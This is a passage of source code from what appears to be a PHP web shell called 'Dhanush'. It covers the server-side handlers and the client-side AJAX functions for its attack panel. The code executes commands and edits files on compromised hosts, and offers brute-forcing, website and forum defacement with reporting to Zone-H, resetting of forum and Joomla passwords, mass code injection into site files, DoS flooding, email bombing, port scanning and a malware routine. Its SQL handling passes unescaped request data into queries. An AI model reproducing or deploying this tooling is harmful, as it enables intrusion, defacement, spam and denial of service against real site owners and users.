4612 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4613 $num = mysql_num_rows( $pResult );
4614
4615 $rowcount = $num;
4616
4617 $pResultLen = mysql_list_fields( $dbname, $tablename );
4618
4619 for( $i = 0; $i < $num; $i++ )
4620 {
4621 $field = mysql_fetch_array( $pResult );
4622 $fieldname = $field["Field"];
4623 $arrdata = $_REQUEST[$fieldname];
4624
4625 $str1 .= "".$fieldname . ",";
4626 $str2 .= "'".$arrdata . "',";
4627 $rowcount--;
4628 if($rowcount != 0)
4629 {
4630 //$str1 .= $fieldname . ",";
4631 //$str2 .= $arrdata . ",";
4632 }
4633 }
4634 $str1=eregi_replace(',$', '', $str1);
4635 $str2=eregi_replace(',$', '', $str2);
4636 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
4637 mysql_query($str);
4638
4639 ?><div id="showsql"></div><?php
4640}
4641else if(isset($_GET['logoutdb']))
4642{
4643 setcookie("dbserver",time() - 60*60);
4644 setcookie("dbuser",time() - 60*60);
4645 setcookie("dbpass",time() - 60*60);
4646 header("Location:$self");
4647}
4648else if(isset($_POST['choice']))
4649{
4650 if($_POST['choice'] == "delete")
4651 {
4652 $actbox = $_POST["actbox"];
4653
4654 foreach ($actbox as $myv)
4655 $myv = explode(",",$myv);
4656 foreach ($myv as $v)
4657 {
4658 if(is_file($v))
4659 {
4660 if(unlink($v))
4661 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
4662 else
4663 echo "<br><center>Cannot Delete File $v</center>";
4664 }
4665 else if(is_dir($v))
4666 {
4667 rrmdir($v);
4668 }
4669 }
4670 }
4671 else if($_POST['choice'] == "chmod")
4672 { ?>
4673 <form id="chform"><?php
4674 $actbox1 = $_POST['actbox'];
4675 foreach ($actbox1 as $myv)
4676 $myv = explode(",",$myv);
4677 foreach ($myv as $v)
4678 { ?>
4679 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
4680 <?php }
4681 ?>
4682 <table align="center" border="3" style="width:40%; border-color:#333333;">
4683 <tr>
4684 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4685 </tr>
4686 <tr>
4687 <td colspan="2" align="center" style="height:60px">
4688 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
4689 </tr>
4690 </table>
4691
4692 </form> <?php
4693 }
4694 else if($_POST['choice'] == "changefileperms")
4695 {
4696 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
4697 {
4698 $actbox = $_POST["actbox"];
4699 foreach ($actbox as $myv)
4700 $myv = explode(",",$myv);
4701 foreach ($myv as $v)
4702 {
4703 if(is_file($v) || is_dir($v))
4704 {
4705 $perms = 0;
4706 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
4707 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
4708 echo "<div align=left style=width:60%;>";
4709 if(@chmod($v,$perms))
4710 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
4711 else
4712 echo "Cannot Change $v File Permissions<br>";
4713 echo "</div>";
4714 }
4715 }
4716
4717 }
4718 }
4719 else if($_POST['choice'] == "compre")
4720 {
4721 $actbox = $_POST["actbox"];
4722 foreach ($actbox as $myv)
4723 $myv = explode(",",$myv);
4724 foreach ($myv as $v)
4725 {
4726 if(is_file($v))
4727 {
4728 $zip = new ZipArchive();
4729 $filename= basename($v) . '.zip';
4730 if(($zip->open($filename, ZipArchive::CREATE))!==true)
4731 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
4732 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
4733 $zip->addFile(basename($v));
4734 $zip->close();
4735 }
4736 else if(is_dir($v))
4737 {
4738 if($os == "Linux")
4739 {
4740 $filename= basename($v);
4741 execmd("tar --create --recursion --file=$filename.tar $v");
4742 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
4743 }
4744 }
4745 }
4746 }
4747 else if($_POST['choice'] == "uncompre")
4748 {
4749 $actbox = $_POST["actbox"];
4750 foreach ($actbox as $myv)
4751 $myv = explode(",",$myv);
4752 foreach ($myv as $v)
4753 {
4754 if(is_file($v) || is_dir($v))
4755 {
4756 $zip = new ZipArchive;
4757 $filename= basename($v);
4758 $res = $zip->open($filename);
4759 if ($res === TRUE)
4760 {
4761 $pieces = explode(".",$filename);
4762 $zip->extractTo($pieces[0]);
4763 $zip->close();
4764 echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
4765 } else
4766 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
4767 }
4768 }
4769 }
4770}
4771else if(isset($_GET['sitename']))
4772{
4773 $sitename = str_replace("http://","",$_GET['sitename']);
4774 $sitename = str_replace("http://www.","",$sitename);
4775 $sitename = str_replace("www.","",$sitename);
4776 $show = myexe("ls -la /etc/valiases/".$sitename);
4777 if(!empty($show))
4778 echo $show;
4779 else
4780 echo "Cannot get the username";
4781}
4782else if(isset($_GET['mydata']))
4783{
4784 listdatabase();
4785}
4786else if(isset($_GET['home']))
4787{
4788 mainfun($_GET['home']);
4789}
4790else if(isset($_GET['dir']))
4791{
4792 mainfun($_GET['myfilepath']);
4793}
4794else if(isset($_GET['mydirpath']))
4795{
4796 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
4797}
4798else
4799{
4800?>
4801<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
4802<title>Dhanush : By Arjun</title>
4803<script type="text/javascript">
4804checked = false;
4805var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
4806function checkedAll ()
4807{
4808 if (checked == false){checked = true}else{checked = false}
4809 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
4810 {
4811 document.getElementById('myform').elements[i].checked = checked;
4812 }
4813}
4814function urlchange(myfilepath)
4815{
4816 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
4817 splitter = "<?php echo addslashes($directorysperator); ?>";
4818 mypath = mpath = myfilepath.split(splitter);
4819 <?php if($os == "Linux") { ?>
4820 r = "/";
4821 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
4822 <?php } ?>
4823 for (i = 0; i < mypath.length; i++)
4824 {
4825 if(mypath[i] == "")
4826 continue;
4827 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
4828
4829 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
4830 }
4831 myurl = myurl.replace(/\\/g,"\\\\");
4832 return myurl;
4833}
4834function wrtblDIR(mydirpath)
4835{
4836 var ajaxRequest;
4837 ajaxRequest = new XMLHttpRequest();
4838
4839 ajaxRequest.onreadystatechange = function()
4840 {
4841 if(ajaxRequest.readyState == 4)
4842 {
4843 for(i=0;i<=3;i++)
4844 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
4845 }
4846 }
4847
4848 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath="+mydirpath, true);
4849 ajaxRequest.send(null);
4850}
4851function setpath(myfilpath)
4852{
4853 wrtblDIR(myfilpath);
4854 document.getElementById("path").value=myfilpath;
4855 document.getElementById("createfile").value=myfilpath;
4856 document.getElementById("createfolder").value=myfilpath;
4857 document.getElementById("createfolder").value=myfilpath;
4858 document.getElementById("exepath").value=myfilpath;
4859 document.getElementById("auexepath").value=myfilpath;
4860 document.getElementById("showdir").innerHTML="";
4861}
4862function changedir(myaction,myfilepath)
4863{
4864 var myurl = urlchange(myfilepath);
4865
4866 document.getElementById("showmaindata").innerHTML=waitstate;
4867 var ajaxRequest;
4868 ajaxRequest = new XMLHttpRequest();
4869
4870 ajaxRequest.onreadystatechange = function()
4871 {
4872 if(ajaxRequest.readyState == 4)
4873 {
4874 setpath(myfilepath);
4875 document.getElementById("crdir").innerHTML=myurl;
4876 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4877 }
4878 }
4879
4880 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
4881 ajaxRequest.send(null);
4882}
4883function gethome(myaction,mydir)
4884{
4885 var myurl = urlchange(mydir);
4886 document.getElementById("showmaindata").innerHTML=waitstate;
4887 var ajaxRequest;
4888 ajaxRequest = new XMLHttpRequest();
4889
4890 ajaxRequest.onreadystatechange = function()
4891 {
4892 if(ajaxRequest.readyState == 4)
4893 {
4894 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4895 setpath(mydir);
4896 document.getElementById("crdir").innerHTML=myurl;
4897 }
4898 }
4899
4900 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
4901 ajaxRequest.send(null);
4902}
4903function getname(sitename)
4904{
4905 document.getElementById("showsite").innerHTML=waitstate;
4906 var ajaxRequest;
4907 ajaxRequest = new XMLHttpRequest();
4908
4909 ajaxRequest.onreadystatechange = function()
4910 {
4911 if(ajaxRequest.readyState == 4)
4912 {
4913 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
4914 }
4915 }
4916
4917 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
4918 ajaxRequest.send(null);
4919}
4920function myaction(myfileaction,chmode)
4921{
4922 var mytype = document.getElementsByName('actbox[]');
4923 var mychoice = new Array();
4924
4925 for (var i = 0, length = mytype.length; i < length; i++)
4926 {
4927 if (mytype[i].checked)
4928 mychoice[i] = mytype[i].value;
4929 }
4930
4931 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
4932
4933 document.getElementById("showdir").innerHTML=waitstate;
4934 var ajaxRequest;
4935 ajaxRequest = new XMLHttpRequest();
4936
4937 ajaxRequest.onreadystatechange = function()
4938 {
4939 if(ajaxRequest.readyState == 4)
4940 {
4941 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
4942 }
4943 }
4944
4945 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4946 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4947 ajaxRequest.send(params);
4948}
4949function editdata()
4950{
4951 var result = "", // initialize list
4952 i,dbname,tablename;
4953 // iterate through arguments
4954 for (i = 1; i < arguments.length; i++)
4955 {
4956 if(i%2 == 0)
4957 result += arguments[i]+'=';
4958 else
4959 result += arguments[i]+'&';
4960 }
4961 result = result.slice(0, -1);
4962
4963 dbname = arguments[3];
4964 tablename = arguments[5];
4965 var result=result.replace(/dhanush_/g,"");
4966 var params = arguments[0]+"="+result;
4967
4968 document.getElementById("showsql").innerHTML=waitstate;
4969 var ajaxRequest;
4970 ajaxRequest = new XMLHttpRequest();
4971
4972 ajaxRequest.onreadystatechange = function()
4973 {
4974 if(ajaxRequest.readyState == 4)
4975 {
4976 viewtables('listTables',dbname,tablename);
4977 }
4978 }
4979
4980 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4981 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4982 ajaxRequest.send(params);
4983}
4984function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
4985{
4986 document.getElementById("showsql").innerHTML=waitstate;
4987 var ajaxRequest;
4988 ajaxRequest = new XMLHttpRequest();
4989
4990 ajaxRequest.onreadystatechange = function()
4991 {
4992 if(ajaxRequest.readyState == 4)
4993 {
4994 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
4995 }
4996 }
4997
4998 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
4999 ajaxRequest.send(null);
5000}
5001function mydatabase(server,username,password)
5002{
5003 document.getElementById("showsql").innerHTML=waitstate;
5004 var ajaxRequest;
5005 ajaxRequest = new XMLHttpRequest();
5006
5007 ajaxRequest.onreadystatechange = function()
5008 {
5009 if(ajaxRequest.readyState == 4)
5010 {
5011 mydatago();
5012 }
5013 }
5014
5015 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
5016 ajaxRequest.send(null);
5017}
5018function mydatago()
5019{
5020 var ajaxRequest;
5021 ajaxRequest = new XMLHttpRequest();
5022
5023 ajaxRequest.onreadystatechange = function()
5024 {
5025 if(ajaxRequest.readyState == 4)
5026 {
5027 document.getElementById("datatable").style.display = 'none';
5028 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5029 }
5030 }
5031
5032 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
5033 ajaxRequest.send(null);
5034}
5035function bruteforce(prototype,serverport,login,dict)
5036{
5037 var mytype = document.getElementsByName('mytype');
5038 for (var i = 0, length = mytype.length; i < length; i++)
5039 {
5040 if (mytype[i].checked)
5041 break;
5042 }
5043 var getreverse = 0;
5044 if(document.getElementById('reverse').checked == true)
5045 getreverse = 1;
5046 else
5047 getreverse = 0;
5048
5049 document.getElementById("showbrute").innerHTML=waitstate;
5050 var ajaxRequest;
5051 ajaxRequest = new XMLHttpRequest();
5052
5053 ajaxRequest.onreadystatechange = function()
5054 {
5055 if(ajaxRequest.readyState == 4)
5056 {
5057 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
5058 }
5059 }
5060
5061 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
5062 ajaxRequest.send(null);
5063}
5064function executemyfile(action,executepath,execute)
5065{
5066 document.getElementById("showmaindata").innerHTML=waitstate;
5067 var ajaxRequest;
5068 ajaxRequest = new XMLHttpRequest();
5069
5070 ajaxRequest.onreadystatechange = function()
5071 {
5072 if(ajaxRequest.readyState == 4)
5073 {
5074 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5075 }
5076 }
5077
5078 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
5079 ajaxRequest.send(null);
5080}
5081function maindata(myaction,dir)
5082{
5083 document.getElementById("showmaindata").innerHTML=waitstate;
5084 var ajaxRequest;
5085 ajaxRequest = new XMLHttpRequest();
5086
5087 ajaxRequest.onreadystatechange = function()
5088 {
5089 if(ajaxRequest.readyState == 4)
5090 {
5091 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5092 document.getElementById("showdir").innerHTML="";
5093 }
5094 }
5095
5096 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
5097 ajaxRequest.send(null);
5098}
5099function manuallyscriptfn(passwd)
5100{
5101 var message = encodeURIComponent(passwd);
5102 var params = "scriptlocator=scriptlocator&passwd="+passwd;
5103 document.getElementById("showdata").innerHTML=waitstate;
5104 var ajaxRequest;
5105 ajaxRequest = new XMLHttpRequest();
5106
5107 ajaxRequest.onreadystatechange = function()
5108 {
5109 if(ajaxRequest.readyState == 4)
5110 {
5111 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5112 }
5113 }
5114
5115 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5116 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5117 ajaxRequest.send(params);
5118}
5119function my404page(message)
5120{
5121 var message = encodeURIComponent(message);
5122 var params = "404page=404page&message="+message;
5123 document.getElementById("showdata").innerHTML=waitstate;
5124 var ajaxRequest;
5125 ajaxRequest = new XMLHttpRequest();
5126
5127 ajaxRequest.onreadystatechange = function()
5128 {
5129 if(ajaxRequest.readyState == 4)
5130 {
5131 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5132 }
5133 }
5134
5135 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5136 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5137 ajaxRequest.send(params);
5138}
5139function executemyfn(executepath,executemycmd)
5140{
5141 document.getElementById("showexecute").innerHTML="Wait....";
5142 var ajaxRequest;
5143 ajaxRequest = new XMLHttpRequest();
5144
5145 ajaxRequest.onreadystatechange = function()
5146 {
5147 if(ajaxRequest.readyState == 4)
5148 {
5149 document.getElementById("showexecute").innerHTML=ajaxRequest.responseText;
5150 }
5151 }
5152
5153 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
5154 ajaxRequest.send(null);
5155}
5156function zoneh(defacer,hackmode,reason,domain)
5157{
5158 var domain = encodeURIComponent(domain);
5159 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
5160 document.getElementById("showzone").innerHTML=waitstate;
5161 var ajaxRequest;
5162 ajaxRequest = new XMLHttpRequest();
5163
5164 ajaxRequest.onreadystatechange = function()
5165 {
5166 if(ajaxRequest.readyState == 4)
5167 {
5168 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
5169 }
5170 }
5171
5172 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5173 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5174 ajaxRequest.send(params);
5175}
5176function savemyfile(file,content)
5177{
5178 var content = encodeURIComponent(content);
5179 var params = "content="+content+"&file="+file;
5180 document.getElementById("showmydata").innerHTML=waitstate;
5181 var ajaxRequest;
5182 ajaxRequest = new XMLHttpRequest();
5183
5184 ajaxRequest.onreadystatechange = function()
5185 {
5186 if(ajaxRequest.readyState == 4)
5187 {
5188 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5189 }
5190 }
5191
5192 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5193 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5194 ajaxRequest.send(params);
5195}
5196function renamefun(file,to)
5197{
5198 document.getElementById("showmydata").innerHTML=waitstate;
5199 var ajaxRequest;
5200 ajaxRequest = new XMLHttpRequest();
5201
5202 ajaxRequest.onreadystatechange = function()
5203 {
5204 if(ajaxRequest.readyState == 4)
5205 {
5206 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5207 }
5208 }
5209
5210 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
5211 ajaxRequest.send(null);
5212}
5213function changeperms(chmode,myfilename)
5214{
5215 document.getElementById("showmydata").innerHTML=waitstate;
5216 var ajaxRequest;
5217 ajaxRequest = new XMLHttpRequest();
5218
5219 ajaxRequest.onreadystatechange = function()
5220 {
5221 if(ajaxRequest.readyState == 4)
5222 {
5223 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5224 }
5225 }
5226
5227 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
5228 ajaxRequest.send(null);
5229}
5230function defacefun(deface)
5231{
5232 var ajaxRequest;
5233 ajaxRequest = new XMLHttpRequest();
5234
5235 ajaxRequest.onreadystatechange = function()
5236 {
5237 if(ajaxRequest.readyState == 4)
5238 {
5239 alert(ajaxRequest.responseText);
5240 }
5241 }
5242
5243 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
5244 ajaxRequest.send(null);
5245}
5246function fileaction(myaction,myfilepath)
5247{
5248 document.getElementById("showmydata").innerHTML=waitstate;
5249 var ajaxRequest;
5250 ajaxRequest = new XMLHttpRequest();
5251
5252 ajaxRequest.onreadystatechange = function()
5253 {
5254 if(ajaxRequest.readyState == 4)
5255 {
5256 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5257 }
5258 }
5259
5260 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
5261 ajaxRequest.send(null);
5262}
5263function bypassfun(funct,functvalue,optiontype)
5264{
5265 document.getElementById("showbyp").innerHTML=waitstate;
5266 var ajaxRequest;
5267 ajaxRequest = new XMLHttpRequest();
5268
5269 ajaxRequest.onreadystatechange = function()
5270 {
5271 if(ajaxRequest.readyState == 4)
5272 {
5273 document.getElementById("showbyp").innerHTML=ajaxRequest.responseText;
5274 }
5275 }
5276
5277 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
5278 ajaxRequest.send(null);
5279}
5280function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
5281{
5282 document.getElementById("showdos").innerHTML=waitstate;
5283 var ajaxRequest;
5284 ajaxRequest = new XMLHttpRequest();
5285
5286 ajaxRequest.onreadystatechange = function()
5287 {
5288 if(ajaxRequest.readyState == 4)
5289 {
5290 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
5291 }
5292 }
5293
5294 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
5295 ajaxRequest.send(null);
5296}
5297function createfile(filecreator,filecontent)
5298{
5299 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
5300 var filecontent = encodeURIComponent(filecontent);
5301 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
5302 document.getElementById("showdir").innerHTML=waitstate;
5303 var ajaxRequest;
5304 ajaxRequest = new XMLHttpRequest();
5305
5306 ajaxRequest.onreadystatechange = function()
5307 {
5308 if(ajaxRequest.readyState == 4)
5309 {
5310 gethome('home',mm);
5311 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5312 }
5313 }
5314
5315 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5316 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5317 ajaxRequest.send(params);
5318}
5319function createdir(create,createfolder)
5320{
5321 document.getElementById("showdir").innerHTML=waitstate;
5322 var ajaxRequest;
5323 ajaxRequest = new XMLHttpRequest();
5324
5325 ajaxRequest.onreadystatechange = function()
5326 {
5327 if(ajaxRequest.readyState == 4)
5328 {
5329 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
5330 }
5331 }
5332
5333 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
5334 ajaxRequest.send(null);
5335}
5336function codeinsert(code)
5337{
5338 var code = encodeURIComponent(code);
5339 var params = "getcode="+code;
5340 document.getElementById("showcode").innerHTML=waitstate;
5341 var ajaxRequest;
5342 ajaxRequest = new XMLHttpRequest();
5343
5344 ajaxRequest.onreadystatechange = function()
5345 {
5346 if(ajaxRequest.readyState == 4)
5347 {
5348 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
5349 }
5350 }
5351
5352 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5353 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5354 ajaxRequest.send(params);
5355}
5356function getmydata(mydata)
5357{
5358 document.getElementById("showmydata").innerHTML=waitstate;
5359 var ajaxRequest;
5360 ajaxRequest = new XMLHttpRequest();
5361
5362 ajaxRequest.onreadystatechange = function()
5363 {
5364 if(ajaxRequest.readyState == 4)
5365 {
5366 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5367 }
5368 }
5369
5370 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
5371 ajaxRequest.send(null);
5372}
5373function getdata(mydata,myfile)
5374{
5375 document.getElementById("showdata").innerHTML=waitstate;
5376 var ajaxRequest;
5377 ajaxRequest = new XMLHttpRequest();
5378
5379 ajaxRequest.onreadystatechange = function()
5380 {
5381 if(ajaxRequest.readyState == 4)
5382 {
5383 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5384 }
5385 }
5386
5387 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
5388 ajaxRequest.send(null);
5389}
5390function getport(host,protocol,start,end)
5391{
5392 document.getElementById("showports").innerHTML=waitstate;
5393 var ajaxRequest;
5394 ajaxRequest = new XMLHttpRequest();
5395
5396 ajaxRequest.onreadystatechange = function()
5397 {
5398 if(ajaxRequest.readyState == 4)
5399 {
5400 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
5401 }
5402 }
5403
5404 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
5405 ajaxRequest.send(null);
5406}
5407function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uid,uname,newpass)
5408{
5409 document.getElementById("showchangepass").innerHTML=waitstate;
5410 var ajaxRequest;
5411 ajaxRequest = new XMLHttpRequest();
5412
5413 ajaxRequest.onreadystatechange = function()
5414 {
5415 if(ajaxRequest.readyState == 4)
5416 {
5417 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
5418 }
5419 }
5420
5421 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uid=" + uid + "&uname=" + uname + "&newpass=" + newpass, true);
5422 ajaxRequest.send(null);
5423}
5424function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,alll,f5)
5425{
5426 var index = encodeURIComponent(index);
5427 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&alll="+alll+"&f5="+f5;
5428 document.getElementById("showdeface").innerHTML=waitstate;
5429 var ajaxRequest;
5430 ajaxRequest = new XMLHttpRequest();
5431
5432 ajaxRequest.onreadystatechange = function()
5433 {
5434 if(ajaxRequest.readyState == 4)
5435 {
5436 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
5437 }
5438 }
5439
5440 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5441 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5442 ajaxRequest.send(params);
5443}
5444function codeinjector(pathtomass,mode,filetype,injectthis)
5445{
5446 var injectthis = encodeURIComponent(injectthis);
5447 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
5448 document.getElementById("showinject").innerHTML=waitstate;
5449 var ajaxRequest;
5450 ajaxRequest = new XMLHttpRequest();
5451
5452 ajaxRequest.onreadystatechange = function()
5453 {
5454 if(ajaxRequest.readyState == 4)
5455 {
5456 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
5457 }
5458 }
5459
5460 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5461 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5462 ajaxRequest.send(params);
5463}
5464function sendmail(mailfunction,to,subject,message,from,times,padding)
5465{
5466 var message = encodeURIComponent(message);
5467 if(mailfunction == "massmailing")
5468 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
5469 else if(mailfunction == "dobombing")
5470 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
5471 document.getElementById("showmail").innerHTML=waitstate;
5472 var ajaxRequest;
5473 ajaxRequest = new XMLHttpRequest();
5474
5475 ajaxRequest.onreadystatechange = function()
5476 {
5477 if(ajaxRequest.readyState == 4)
5478 {
5479 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
5480 }
5481 }
5482
5483 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5484 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5485 ajaxRequest.send(params);
5486}
5487function execode(code)
5488{
5489 var intext = document.getElementById('intext').checked;
5490 var message = encodeURIComponent(message);
5491 var params = "code="+code+"&intext="+intext;
5492 document.getElementById("showresult").innerHTML=waitstate;
5493 var ajaxRequest;
5494 ajaxRequest = new XMLHttpRequest();
5495
5496 ajaxRequest.onreadystatechange = function()
5497 {
5498 if(ajaxRequest.readyState == 4)
5499 {
5500 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
5501 }
5502 }
5503
5504 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5505 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5506 ajaxRequest.send(params);
5507}
5508function malwarefun(malwork)
5509{
5510 var malpath = document.getElementById('createfile').value;
5511 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
5512 var ajaxRequest;
5513 ajaxRequest = new XMLHttpRequest();
5514
5515 ajaxRequest.onreadystatechange = function()
5516 {
